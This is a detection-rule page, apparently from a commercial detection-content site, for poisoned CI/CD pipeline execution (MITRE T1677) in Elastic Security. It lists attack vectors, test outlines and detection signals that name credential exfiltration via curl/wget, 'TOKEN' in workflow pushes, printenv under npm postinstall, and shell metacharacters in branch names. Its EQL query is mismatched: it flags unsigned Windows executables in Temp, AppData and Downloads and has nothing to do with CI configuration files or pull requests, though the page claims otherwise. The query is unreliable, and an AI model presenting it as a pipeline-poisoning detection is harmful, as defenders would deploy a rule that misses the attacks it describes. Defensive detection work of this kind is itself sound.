Detect Poisoned Pipeline Execution in Elastic Security
This detection identifies adversaries attempting to poison CI/CD pipelines through direct modification of CI configuration files, injection of malicious code into pipeline-referenced build artifacts, or exploitation of fork-based pull request workflows that expose pipeline secrets. Detections span three attack vectors: (1) Direct pipeline execution — changes to CI config files (e.g., .github/workflows, .gitlab-ci.yml, Jenkinsfile) containing suspicious commands such as credential exfiltration via curl/wget, base64-encoded payloads, or environment variable dumping; (2) Indirect pipeline execution — modifications to Makefiles, linters, test suites, or build scripts that are invoked by trusted CI configurations; (3) Public pipeline execution — fork-based pull requests targeting pull_request_target workflows or injecting malicious branch names that are processed as trusted inputs by pipeline steps. Detection coverage includes Azure DevOps audit logs, GitHub audit log events, and process telemetry from CI runner hosts.
MITRE ATT&CK
- Tactic
- Execution
- Technique
- T1677 Poisoned Pipeline Execution
- Canonical reference
- https://attack.mitre.org/techniques/T1677/
Elastic Detection Query
file where event.type in ("creation", "change") and (
file.path : ("*\\Temp\\*", "*\\AppData\\*", "*\\Downloads\\*") and
file.extension in ("exe", "dll", "bat", "ps1", "vbs", "hta", "js")
) and not process.code_signature.trusted == trueElastic EQL detection for Poisoned Pipeline Execution (T1677). Identifies poisoned pipeline execution activity by correlating endpoint telemetry patterns consistent with known adversary techniques.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate DevOps engineers updating pipeline definitions to add new build steps or integrations — validate against change management tickets
- Authorized security scanning tools (Snyk, Dependabot, GitHub Advanced Security) modifying workflow files during automated PR creation
- Infrastructure-as-code pipelines that legitimately use curl/wget to download build dependencies or SDKs from trusted artifact registries
Other platforms for T1677
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Direct CI Config Poisoning - GitHub Actions Credential Exfiltration Simulation
Expected signal: GitHubAuditLog: Action=git.push with repository_file matching .github/workflows path and DataStr containing 'curl' and 'TOKEN'. AzureDevOpsAuditing: OperationName=Git.Push with Data containing workflow file path and suspicious curl command.
- Test 2Indirect Pipeline Poisoning - Malicious npm postinstall Script Injection
Expected signal: DeviceProcessEvents: InitiatingProcessFileName=npm spawning sh/bash with ProcessCommandLine containing 'printenv'. Sysmon Event ID 1: ParentImage=npm, CommandLine matching printenv/grep pattern. linux_secure or auditd: execve syscall for printenv spawned under npm process.
- Test 3Public Pipeline Execution - Fork PR with Malicious Branch Name Injection
Expected signal: GitHubAuditLog: Action=pull_request.opened with pull_request.head.repo.full_name != pull_request.base.repo.full_name (fork indicator). Branch name field containing shell metacharacters triggers IsSuspiciousBranch=true in hunting query.
References (5)
- https://attack.mitre.org/techniques/T1677/
- https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution
- https://securitylab.github.com/research/github-actions-preventing-pwn-requests/
- https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions
- https://unit42.paloaltonetworks.com/github-actions-supply-chain-attack-2025/
Unlock Pro Content
Get the full detection package for T1677 including response playbook, investigation guide, and atomic red team tests.